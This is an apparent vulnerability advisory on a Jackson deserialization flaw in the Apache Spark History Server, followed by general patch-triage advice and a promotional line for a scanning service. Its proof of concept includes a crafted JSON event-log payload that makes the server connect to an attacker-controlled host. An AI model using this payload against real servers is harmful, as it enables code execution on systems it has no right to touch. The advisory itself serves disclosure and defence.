This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.
Summary
Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.
Details
The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.
The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.
Proof of Concept:
Run Spark with event logging enabled, writing to a writable directory (spark-logs).
Inject the following JSON at the beginning of an event log file:
{
"Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } }
Start the Spark History Server with logs pointing to the modified directory.
The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.
Impact
An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
| Software | From | Fixed in |
|---|---|---|
org.apache.spark / spark-core_2.13
|
4.0.0 | 4.0.1 |
org.apache.spark / spark-core_2.13
|
- | 3.5.7 |
org.apache.spark / spark-core_2.12
|
- | 3.5.7 |
org.apache.spark / spark-core_2.11
|
- | 2.4.8.x |
org.apache.spark / spark-core_2.10
|
- | 2.2.3.x |
org.apache.spark / spark-core_2.9.3
|
- | 0.8.1-incubating.x |
| apache / spark | - | 3.5.7 |
| apache / spark | 4.0.0 | 4.0.0.x |
| apache / spark | 4.0.0-rc1 | 4.0.0-rc1.x |
| apache / spark | 4.0.0-rc2 | 4.0.0-rc2.x |
| apache / spark | 4.0.0-rc3 | 4.0.0-rc3.x |
| apache / spark | 4.0.0-rc4 | 4.0.0-rc4.x |
| apache / spark | 4.0.0-rc5 | 4.0.0-rc5.x |
| apache / spark | 4.0.0-rc6 | 4.0.0-rc6.x |
| apache / spark | 4.0.0-rc7 | 4.0.0-rc7.x |
| apache / spark | 4.0.1-rc1 | 4.0.1-rc1.x |
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.